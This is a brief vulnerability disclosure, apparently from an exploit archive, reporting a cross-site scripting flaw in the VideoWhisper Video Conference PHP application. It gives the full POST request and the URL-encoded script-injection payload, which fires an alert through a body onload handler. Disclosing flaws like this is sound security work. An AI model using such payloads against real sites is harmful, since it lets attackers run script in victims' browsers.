# ==============================================================
# Title ...| VideoWhisper Video Conference XSS
# Version .|  
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| 
# ==============================================================

 
# ==============================================================
# XSS

---<request>---
POST /k/cms/vc/vc_php/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 43

r='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---

 
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/